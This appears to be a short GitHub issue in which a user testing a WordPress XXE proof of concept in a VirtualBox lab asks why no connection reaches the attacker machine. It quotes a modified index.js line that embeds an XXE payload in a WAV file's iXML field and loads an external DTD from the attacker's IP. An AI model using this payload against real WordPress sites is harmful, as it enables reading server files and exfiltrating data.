How to exploit on remote host?

[b3d3c]

Hello,

First of all, thank your work.

I am testing your PoC on a Virtualbox lab with 2 different machines, one as attacker and the other one hosting the Wordpress. I test it changing index.js as following but no connection was received in the attacker machine:

wav.setiXML('<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM \'http://10.10.10.20:8001/evil.dtd\'>%remote;%init;%trick;]>');

The attacker machine is 10.10.10.20 and the victim (Wordpress hosting machine) is 10.10.10.21.

Thank you for your work.